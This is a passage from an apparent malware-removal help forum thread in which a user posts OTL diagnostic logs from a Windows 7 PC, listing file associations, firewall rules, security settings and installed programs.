[2014/03/04 06:08:14 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=6CE2AE073BD21C542FC2C707CAE944CC -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22616_none_ce748d1d04acf24f\winlogon.exe
[2014/03/04 04:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18409_none_cdf8bf35eb848572\winlogon.exe
[2014/07/16 21:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\erdnt\cache64\winlogon.exe
[2014/07/16 21:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\SysNative\winlogon.exe
[2014/07/16 21:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18540_none_cdc47ed1ebad0e4e\winlogon.exe
[2014/07/15 22:23:23 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=98AA0BFEE089C7E5DADB94190D93456C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22750_none_ce434d9704d2c730\winlogon.exe
[2014/10/01 10:09:16 | 000,761,656 | ---- | M] (MalwareBytes) MD5=C0AFB3C7E6C7CA3F6E42FF242BBBCB1F -- C:\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\winlogon.exe
< End of report >
ascot1340
2014-11-09, 22:54
Here is the Extras.Txt log
OTL Extras logfile created on: 11/8/2014 9:01:25 PM - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Ryan\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
7.90 Gb Total Physical Memory | 6.56 Gb Available Physical Memory | 83.07% Memory free
15.79 Gb Paging File | 13.87 Gb Available in Paging File | 87.86% Paging File free
Paging file location(s): ?:\pagefile.sys
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 919.21 Gb Total Space | 829.55 Gb Free Space | 90.25% Space Free | Partition Type: NTFS
Computer Name: RYAN-PC | User Name: Ryan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
========== Extra Registry (SafeList) ==========
========== File Associations ==========
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
========== Shell Spawning ==========
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- rundll32.exe %SystemRoot%\system32\mshtml.dll,PrintHTML "%1" (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
========== Security Center Settings ==========
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"FirewallDisableNotify" = 0
"AntiVirusDisableNotify" = 0
"UpdatesDisableNotify" = 0
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
========== System Restore Settings ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0
========== Firewall Settings ==========
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
========== Authorized Applications List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
========== Vista Active Open Ports Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{045DEC82-E4AC-4BF2-B6A7-8E350CF9F7D6}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{074C9272-A6C5-4CAB-9850-80B88271856A}" = lport=2869 | protocol=6 | dir=in | app=system |
"{1F7574DF-FCC4-44C0-9A7B-2928DBADEE50}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{2A827F28-6915-42A3-8479-B26D5C6FF0F6}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{3EBB5621-63FD-49CB-A084-344E45133E29}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{43ECA463-55F1-459B-954E-F557DBAB77DB}" = lport=139 | protocol=6 | dir=in | app=system |
"{4705EFA5-4F6D-41DE-BEC6-B28AA9D5D28C}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{61624434-D22A-4D12-A37B-27F99C70B6AE}" = lport=10243 | protocol=6 | dir=in | app=system |
"{61A85359-0354-45EA-B9A2-62C79F8EE11F}" = rport=10243 | protocol=6 | dir=out | app=system |
"{7638957D-8DA4-4DEB-84BD-85295A07617B}" = rport=138 | protocol=17 | dir=out | app=system |
"{809D5227-4F24-4618-A744-275CA1586490}" = rport=139 | protocol=6 | dir=out | app=system |
"{81BCEA7A-ABB8-48BB-8003-616369596713}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{85C76C07-10BD-41D9-87A3-BAD587F4AB2C}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{89BFA4DC-4699-4BB4-B6B8-44FD85AEA62B}" = lport=445 | protocol=6 | dir=in | app=system |
"{91FED168-5C8E-4B63-B77F-83F5D542E94F}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{946D27E0-AF8E-4F93-94DE-BBDB46C390E4}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |
"{AF31F970-A2F2-44B7-B314-4E481A3A3FD8}" = rport=445 | protocol=6 | dir=out | app=system |
"{AF7B7E83-5FB7-455C-95CA-5CBF463FE0A8}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |
"{C0244FD5-DBB1-4826-9D59-E5C06BCB250F}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{C1B389EF-18A7-4CBD-AE04-123E274E0BAC}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{C5BF095B-621D-4AF5-919B-F812369E35D0}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{C799C2E4-AEB8-4F99-ADFA-D73D2DB5BE7B}" = lport=137 | protocol=17 | dir=in | app=system |
"{D095A7F6-558A-4D58-992B-B93A5A914B8C}" = rport=137 | protocol=17 | dir=out | app=system |
"{DB2C540C-8FF4-4A09-B1C0-1D99A695D782}" = lport=138 | protocol=17 | dir=in | app=system |
"{EA935328-1862-45DC-96B5-AFFA80CC4DEA}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
========== Vista Active Application Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{02EB3B4C-8624-49EF-AB8F-29C2EC19DD4D}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{086BCAE2-4D74-409E-8423-1816A532C379}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{0BE192B2-BB94-42D2-AB09-DEC8553ADA98}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\uninstall.exe |
"{0FC354C9-FA2F-436E-A2D9-A1AFC2F97531}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{111A665F-2E94-4685-9FF8-0293396EE84D}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{1849302A-1C9A-42FF-9C6A-28E209919120}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{1FA7115B-86DB-4420-A422-66670026B9B8}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{223E1EAC-D9A0-4576-9FAE-826B4662DD6E}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{249AC684-B980-42BD-8A7A-49E4596218DD}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{28F715C9-D1D0-45C3-983F-176434930E1E}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{29B99958-5D7E-44C2-95ED-3E4B31B4DD3E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{2E7F2C93-4833-4F43-9FFD-FEA068780677}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\idsalert.exe |
"{306D4CEA-0E1E-4B46-BB78-F15F8930764D}" = protocol=6 | dir=in | app=c:\program files (x86)\common files\common desktop agent\cdasrv.exe |
"{3147E72E-A39B-43C3-934E-3CF2B3BA8B5F}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\cdas2pc.exe |
"{3595678D-D944-4F6F-AD76-8DF663889251}" = protocol=6 | dir=in | app=c:\program files\common files\common desktop agent\cdasrv.exe |
"{3ECB6891-14E5-44AE-BF91-95EFD581D364}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\scan2pcnotify.exe |
"{422A94AA-28AC-4496-9D4C-B47B56B48AA1}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{47AD6022-1718-475A-940C-0465A4EB134B}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{4D9C389B-97A1-4C3F-86F0-BBA9BBF017ED}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ordersupplies.exe |
"{52221069-C4A9-4545-BEFF-512E27004917}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ordersupplies.exe |
"{52449806-C299-48DA-8A17-9301560A9598}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{53013286-C963-432F-A351-1F9B81D59CEF}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ids.application.exe |
"{53C69CC2-61CA-4A52-A91F-F0D7FB18BF35}" = dir=in | app=c:\program files (x86)\windows live\mesh\moe.exe |
"{55696D07-8A1C-45D5-8C63-12A4E43366D8}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{57E2BD63-5A08-4AC7-9500-D56B109A6F2C}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe |
"{5A9E53BA-5EFF-4961-92C4-5C1682E5824A}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\idsalert.exe |
"{67D30254-D2E5-47D2-BCAD-F24B101FD28B}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{683C148C-0AFB-4154-B5D8-CFD1B300F48A}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{6D2CCB4D-3BEA-4AC1-B411-28EF70A1198E}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\cdas2pc.exe |
"{6DDE9889-33B0-484D-B8AB-8B8B83D1AA9A}" = protocol=17 | dir=in | app=c:\program files\common files\common desktop agent\cdasrv.exe |
"{6E4F8A6C-235D-40F6-8593-E11858E42044}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{6E8B5974-018E-4374-B0A3-4D5540B11E7B}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |
"{6EB07C3B-A50F-48C3-B850-57C520D1DE27}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\cdas2pc.exe |
"{71979C74-EA58-4738-9804-5EDADCAB2D16}" = protocol=17 | dir=in | app=c:\program files\common files\common desktop agent\cdasrv.exe |
"{72D04B77-E0F7-4D95-8BF0-5A9F7D5C79FF}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\uninstall.exe |
"{78AD0A91-2C4B-4FC0-94FA-AC7ADB4C112F}" = protocol=17 | dir=in | app=c:\program files (x86)\common files\common desktop agent\cdasrv.exe |
"{7A3DA645-C7F4-4BE6-BFF8-92CE48CB8CE5}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\scanprocess.exe |
"{7B9F8286-68B5-4E9A-819D-8E620A7943B0}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{80BD8593-996F-42D2-A828-2FADF5ABA457}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |
"{8C3162E1-D6C4-4199-98D1-7DC5C7CFA2B6}" = protocol=6 | dir=in | app=c:\program files\common files\common desktop agent\cdasrv.exe |
"{8CFFD7B5-C5B3-421B-B872-FC27F9299404}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{8D56A144-53E7-486C-85AE-77E121D63F40}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\uninstall.exe |
"{935B30BF-6BD2-4E86-9220-050C8ACBAB26}" = protocol=6 | dir=in | app=c:\program files (x86)\common files\common desktop agent\cdasrv.exe |
"{9A169121-33D5-4003-B3A3-1E150E2F0B98}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ordersupplies.exe |
"{9BEEC7E5-A8CE-40F9-905F-9ADDFEF8B978}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\idsalert.exe |
"{9EDF5511-2661-410A-8EDD-B81A430F0C4B}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ids.application.exe |
"{A9630DCF-2949-4BDF-B6DE-1BA46DF54758}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{B493DEF6-1576-4302-8EF3-FFB39A4E1410}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\scan2pcnotify.exe |
"{C5777947-2C80-4A71-9CE6-1AF90D7F1612}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ids.application.exe |
"{C75C55BE-437D-4505-96C8-6C6F92351A2A}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\scanprocess.exe |
"{D1B6BA29-8C67-4110-A6F2-10A41B874058}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\idsalert.exe |
"{D44DA923-0341-40F2-9E90-492E17D618F7}" = protocol=17 | dir=in | app=c:\program files (x86)\common files\common desktop agent\cdasrv.exe |
"{D978BB3A-5037-4A11-B2F0-E5C18044C299}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\uninstall.exe |
"{E59D0CF5-4EA6-4BD8-BBC2-0531861FE6CB}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{E6C46972-1489-4BED-AE52-FD0715512071}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\cdas2pc.exe |
"{ECE1447E-CB5B-4FF0-924A-C2A89658253E}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |
"{EE10D390-EFBE-40CB-8241-6EECD2BD5688}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{EEC0D538-3C97-4926-BE44-F1F6B8CD2674}" = protocol=6 | dir=out | app=system |
"{F18B8467-9682-4BE8-9243-62D8B29CFB8F}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ids.application.exe |
"{F4A5D122-52CE-42D6-A011-7CD62343EF6E}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{FC0A1FDD-44B4-49D4-9EB5-EF3BF5056890}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{FFC53E80-2CF1-48BB-A928-7C1DB5F413FB}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ordersupplies.exe |
"TCP Query User{3FC8DDF4-7515-4E6B-9863-BC24F56E33F1}C:\program files\onone software\perfect photo suite 7\perfect photo suite 7.exe" = protocol=6 | dir=in | app=c:\program files\onone software\perfect photo suite 7\perfect photo suite 7.exe |
"TCP Query User{82194CFF-0E55-445A-AFB5-6B669431197A}C:\program files (x86)\internet explorer\iexplore.exe" = protocol=6 | dir=in | app=c:\program files (x86)\internet explorer\iexplore.exe |
"UDP Query User{18874B1D-A553-4BD6-937B-53201E53CB6C}C:\program files (x86)\internet explorer\iexplore.exe" = protocol=17 | dir=in | app=c:\program files (x86)\internet explorer\iexplore.exe |
"UDP Query User{2E662723-25A0-4A5A-AE58-095ECB309858}C:\program files\onone software\perfect photo suite 7\perfect photo suite 7.exe" = protocol=17 | dir=in | app=c:\program files\onone software\perfect photo suite 7\perfect photo suite 7.exe |
========== HKEY_LOCAL_MACHINE Uninstall List ==========
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{027E5FAB-1476-4C59-AAB4-32EF28520399}" = Windows Live Language Selector
"{031A0E14-0413-4C97-9772-2639B782F46F}" = Common Desktop Agent
"{07EEE598-5F21-4B57-B40B-46592625B3D9}" = Zune Language Pack (PTB)
"{171C7193-1BB5-4619-BF23-E962598CAB13}" = Intel® Trusted Connect Service Client
"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
"{20B0E07B-12EA-4BAB-A3B1-E17D7568EB6F}" = Garmin ANT Agent
"{230D1595-57DA-4933-8C4E-375797EBB7E1}" = Atheros Bluetooth Suite (64)
"{23F2C78C-E131-4CA0-8F84-3473FB7728BA}" = Microsoft Security Client
"{2C4E2E4E-A7C9-4CCB-BF03-FE6EBD5D4AB7}" = Windows Mobile Device Updater Component
"{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}" = Premium Sound HD
"{5C93E291-A1CC-4E51-85C6-E194209FCDB4}" = Zune Language Pack (PTG)
"{5E2CD4FB-4538-4831-8176-05D653C3E6D4}" = Windows Live Remote Service Resources
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{656DEEDE-F6AC-47CA-A568-A1B4E34B5760}" = Windows Live Remote Service Resources
"{6740BCB0-5863-47F4-80F4-44F394DE4FE2}" = Zune Language Pack (NLD)
"{6B33492E-FBBC-4EC3-8738-09E16E395A10}" = Zune Language Pack (ESP)
"{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{7006ED29-58F2-40C3-AE87-039287AD20B6}" = Zune
"{787136D2-F0F8-4625-AA3F-72D7795AC842}" = Apple Mobile Device Support
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{847B0532-55E3-4AAF-8D7B-E3A1A7CD17E5}" = Windows Live Remote Client Resources
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8EB588BD-D398-40D0-ADF7-BE1CEEF7C116}" = Windows Live Remote Client Resources
"{90140000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2010
"{90140000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2010
"{90140000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036" = Microsoft .NET Framework 4.5.1 (Français)
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082" = Microsoft .NET Framework 4.5.1 (español)
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{A679FBE4-BA2D-4514-8834-030982C8B31A}" = Windows Live Remote Service Resources
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 296.28
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 296.28
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Optimus" = NVIDIA Optimus 1.7.12
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA PhysX System Software 9.12.0213
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components
"{B750FA38-7AB0-42CB-ACBB-E7DBE9FF603F}" = Windows Live Remote Client Resources
"{B8BA155B-1E75-405F-9CB4-8A99615D09DC}" = iTunes
"{BE236D9A-52EC-4A17-82DA-84B5EAD31E3E}" = Zune Language Pack (DEU)
"{C22759DB-BA8B-30E7-99EE-8B47DB43AE56}" = Microsoft .NET Framework 4.5.1 (FRA)
"{C5D37FFA-7483-410B-982B-91E93FD3B7DA}" = Zune Language Pack (ITA)
"{C68D33B1-0204-4EBE-BC45-A6E432B1D13A}" = Zune Language Pack (FRA)
"{D6E5E5FE-83CF-3CFC-AF7A-11F05613705B}" = Microsoft .NET Framework 4.5.1 (ESN)
"{D8CC254C-C671-4664-9A38-FA368D1E2C97}" = SES Driver
"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter
"{DF6D988A-EEA0-4277-AAB8-158E086E439B}" = Windows Live Remote Client
"{E02A6548-6FDE-40E2-8ED9-119D7D7E641F}" = Windows Live Remote Service
"{F87D3E88-3E80-4233-96EF-C3C392778A81}" = Cirrus Logic Audio x64
"24DA573F901348FFDFF7717497830D45BE0C362E" = Windows Driver Package - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2)
"4CA7CFBB29889F25ACB3DF6E3A42BAE29EB43B20" = Windows Driver Package - Western Digital Technologies (WDC_SAM) WDC_SAM (01/19/2011 1.0.0009.0)
